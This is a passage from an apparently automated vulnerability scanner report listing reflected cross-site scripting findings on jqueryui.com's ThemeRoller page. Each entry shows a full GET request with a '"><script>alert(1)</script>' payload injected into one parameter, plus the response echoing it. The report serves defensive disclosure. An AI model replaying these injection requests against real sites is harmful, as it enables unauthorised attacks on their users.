GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c9d5c"><script>alert(1)</script>421aee9aa0f&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c9d5c"><script>alert(1)</script>421aee9aa0f&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

4.626. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec5"><script>alert(1)</script>90d72c19db1 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serifd3ec5"><script>alert(1)</script>90d72c19db1&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serifd3ec5"><script>alert(1)</script>90d72c19db1&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

4.627. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae8b"><script>alert(1)</script>06aa04249d4 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em8ae8b"><script>alert(1)</script>06aa04249d4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em8ae8b"><script>alert(1)</script>06aa04249d4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

4.628. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc66"><script>alert(1)</script>b02328b292f was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal9cc66"><script>alert(1)</script>b02328b292f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal9cc66"><script>alert(1)</script>b02328b292f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

4.629. http://jqueryui.com/themeroller/ [iconColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44097"><script>alert(1)</script>a09edf276e3 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=45454544097"><script>alert(1)</script>a09edf276e3&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=45454544097"><script>alert(1)</script>a09edf276e3&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

4.630. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836c3"><script>alert(1)</script>8b1747e34da was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222836c3"><script>alert(1)</script>8b1747e34da&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222836c3"><script>alert(1)</script>8b1747e34da&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

4.631. http://jqueryui.com/themeroller/ [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e8a4"><script>alert(1)</script>eb9f889d3a7 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888887e8a4"><script>alert(1)</script>eb9f889d3a7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888887e8a4"><script>alert(1)</script>eb9f889d3a7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

4.632. http://jqueryui.com/themeroller/ [iconColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cff7"><script>alert(1)</script>b21e4745897 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a7cff7"><script>alert(1)</script>b21e4745897&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a7cff7"><script>alert(1)</script>b21e4745897&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

4.633. http://jqueryui.com/themeroller/ [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d3c3"><script>alert(1)</script>f3869e5e299 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222224d3c3"><script>alert(1)</script>f3869e5e299&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222224d3c3"><script>alert(1)</script>f3869e5e299&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

4.634. http://jqueryui.com/themeroller/ [iconColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be373"><script>alert(1)</script>882164f26de was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ffbe373"><script>alert(1)</script>882164f26de&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&o